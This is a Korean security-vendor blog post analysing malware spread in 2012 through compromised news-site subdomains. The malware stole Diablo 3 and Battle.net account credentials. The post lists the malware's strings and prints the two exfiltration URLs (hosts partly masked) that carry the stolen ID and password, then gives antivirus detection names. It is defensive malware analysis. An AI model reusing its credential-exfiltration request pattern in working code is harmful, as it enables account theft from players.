2012년 05월 15일! 디아블로 매니아들은 열광했다.

고대하던 디아블로 3의 정식 출시 일이며, 많은 사용자들이 예약판매 등을 통해 플레이하는 즐거운 상상에 빠져 있었다. 그것도 잠시.. 서비스 논란에 이어 인터넷 상에는 자신의 디아블로 계정정보가 유출되었다는 글이 심심치 않게 올라왔다.

 

디아블로의 출시일로부터 11일 이후인 26일경, 일부 언론사를 통해서 유포된 게임핵 악성코드에 대하여 알아보자.

(디아블로와 관련된 모든 피해가 이 문서에서 언급한 게임핵 악성코드에 의해서 발생한 것이라고 단정지을 수는 없다.)

 

 26일 당시 게임핵 악성코드를 유포했던 특정 언론사의 경우 상위 도메인을 기준으로 서비스 별로 여러 개의 하위 도메인이 존재하고, 각 하위 도메인 별로 각각 다른 페이지에 악성코드를 다운로드 하는 주소가 삽입되어 있다.

(현재 유포 URL은 유효하지 않다.)

 

[그림 1] 언론사의 악성코드 유포구조

 

각 서브 도메인의 페이지에 삽입된 악성 스크립트 코드는 "스페이스와 탭을 이용한 자바스크립트 난독화"형태의 코드이다.

※ 스페이스와 탭을 이용한 자바스크립트 난독화 출현: http://asec.ahnlab.com/767

 

[그림 2] 스페이스와 탭을 이용한 자바스크립트

 

 

악성코드에는 아래와 같은 문자열들이 존재한다.

 

00012C24 10014824 0 Diablo3

00012C2C 1001482C 0 Diablo III.exe

 

0001240C 1001400C 0 &password

00012418 10014018 0 accountName

00012424 10014024 0 kr.battle.net

 

위 문자열들로 아래와 같이 추정 가능하다.

 

1. 디아블로 3가 실행 중일 경우와 2. kr.battle.net 사이트에 로그인 할 경우 계정정보가 탈취 될 수 있을것으로 추정해볼 수 있다.

 

실제 사용자의 계정정보를 탈취하기 위해 위의 2가지 방식을 사용했으며 전송 과정은 아래와 같다.

특이한 점은 계정정보를 탈취한 후 각각 다른 주소로 전송한다.

 

1. 디아블로 3가 실행중인 경우

http://blood.***sda.com/post.asp?para=zj527&d00=XXLR&d01=XXLR&d10=[계정 ID]

&d11=[계정 PW]&d20=&d21=&d30=&d32=&d40=0&d60=&d61=&d70=0&d50=56

 

2. kr.battle.net 사이트에 로그인할 경우

http://lep.***sds.com/ah3/post.asp?para=zj527&d00=Diablo3&d01=Diablo3&d10==[계정 ID]&d11==[계정 PW]&d20=&d21=&d30=&d32=&d40=0&d60=&d61=&d70=0&d50=

 

이번에 발견된 게임핵 악성코드는 디아블로를 포함한 다수의 온라인 게임들의 계정정보를 탈취할 목적을 가지고 있다.

 

V3 제품에서는 아래와 같이 진단이 가능하다.

 

Trojan/Win32.OnlineGameHack

Trojan/Win32.Gampass

 

신고
Creative Commons License
Creative Commons License
Posted by DH, L@@